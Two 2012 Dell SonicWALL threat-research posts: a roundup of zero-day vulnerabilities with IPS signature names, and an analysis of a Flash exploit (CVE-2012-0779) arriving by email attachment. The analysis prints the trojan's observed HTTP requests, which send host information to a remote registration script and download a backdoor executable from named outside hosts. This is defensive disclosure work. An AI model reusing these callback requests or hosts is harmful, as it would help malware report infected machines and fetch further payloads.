Posts

Well-known Zero-day Vulnerabilities 2012 Summary (Aug 9, 2012)

A zero-day attack or threat is an attack that exploits a previously unknown vulnerability in a computer application, operation system etc. Multiple zero-day vulnerabilities can be found each year. The following are the well-known zero-day vulnerabilities for the first half year of 2012. Dell SonicWALL coverage for these vulnerabilities and references are also listed:

With the deployed signatures, Dell SonicWALL has prevented the customers from being attacked. The following are the statistics within last 20 days:

2012 Zero-day hits

To better protect our customers, Dell SonicWALL has partnered with Microsoft on the MAPP program, and here is the MAPP landing page: https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=380.

In the above page, you can find all the Microsoft released vulnerabilities and our coverage for the past two years. Dell SonicWALL has been successfully cooperated with Microsoft for the vulnerabilities detecting and preventing, for example, the latest 0day vulnerability CVE-2012-1889, we have deployed the signatures at the same day when Microsoft released the public advisory: MAPP Partners with Updated Protections

In addition to the signatures of detecting 0day vulnerabilities, we have more than 200 shellcode detection IPS signatures, which proactively detects and blocks many attacks in the wild. The following are some examples of the IPS signatures:

  • 4569 HTTP Server Shellcode Exploit 8
  • 4573 Server Application Shellcode Exploit 10
  • 4574 HTTP Server Shellcode Exploit 10
  • 4584 Server Application Shellcode Exploit 17
  • 4598 Server Application Shellcode Exploit 3
  • 4601 HTTP Server Shellcode Exploit 11

New Adobe Flash Player exploit (May 4, 2012)

SonicWALL Threats Research team observed a new Flash exploit in the wild targeting the recently patched Adobe Flash Player vulnerability – CVE-2012-0779.

The exploit arrives as an e-mail attachment and if the user opens the document it will attempt to exploit the newly patched Adobe Flash Player vulnerability. Upon successful run, it will drop and run additional malware on the victim machine.

The specially crafted document will invoke Microsoft Internet Explorer in the background to download a malicious SWF exploit file from a remote compromised server located in Korea:

The HTTP request to the remote server contains information about the compromised host name and the offset at which the malicious executable is embedded inside the document. The response contains a compressed SWF exploit file which has an ActionScript payload encrypted via DoSWF.

A quick look at the SWF exploit file metadata shows the User account & Author website information used to encrypt this file:

The embedded executable file inside the document is XOR’ed using 0x85 key and is a Downloader Trojan:

The Downloader Trojan was dropped and executed upon successful exploit run. It registers the infection on a remote site and downloads a Backdoor Trojan.

     GET /register/log.asp?isnew=-1&LocalInfo=(Operating System Information)&szHostName=(HOSTNAME)&tmp3=tmp3 Host: dextsolution.com  GET /Include/lib/ps.exe [ Detected as PcClient.NGO_3 (Trojan) ] Host: www.multicodec.co.kr 

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CVE-2012-0779.dc (Exploit)
  • GAV: CVE-2012-0779#swf (Exploit)
  • GAV: Mdrop.DOI (Trojan)
  • GAV: PcClient.NGO_3 (Trojan)

SonicWALL Intrusion Prevention system provides protection against this threat via the following signatures:

  • 7772 – Adobe Flash Player Object Confusion Exploit 1
  • 7773 – Adobe Flash Player Object Confusion Exploit 2